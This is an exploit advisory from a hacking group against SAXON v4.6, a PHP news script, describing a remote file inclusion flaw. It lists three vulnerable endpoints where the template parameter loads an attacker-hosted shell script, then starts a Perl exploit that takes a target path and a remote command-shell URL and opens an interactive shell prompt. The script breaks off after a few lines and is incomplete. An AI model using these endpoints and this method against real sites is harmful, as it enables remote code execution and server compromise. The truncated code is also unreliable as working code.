|
"""""""""""""""""""""""""""""""""""""""""""""""
""" :: :: ::::: :::: """
""" :: :: :: : :: """
""" :::: :: :: ::::: ::::: :::: """
""" :: :: ::: ::: :: :: :: :: :: """
""" :: :: :: : : ::::: :: :: :::: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""
Xmor$ Security Vulnerability Research TM
# Tilte: SAXON : Simple Accessible XHTML Online News v4.6 Remote File Include Exploit
# Author..................: [the_Edit0r]
# Location ...............: [Iran]
# Homepage ...............: [Www.XmorS-sEcurity.coM]
[Www.XmorS.coM] [Www.XmorS.neT]
# Software ...............: [SAXON]
# Impact..................: [Remote]
# Advisory ...............: [Www.XmorS-sEurity.coM/advisory/SAXON(rfi).txt]
# Site Script ............: [http://www.blackwidows.co.uk]
# We ArE .................: [Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel]
# SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM]
# Vulnerabilities ........:
www.example.com/[path]/news.php?template=[Shell-Script]
www.example.com/[path]/preview.php?template=[Shell-Script]
www.example.com/[path]/archive-display.php?template=[Shell-Script]
-------------------------------- Exploit --------------------------------------------
#!/usr/bin/perl
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while(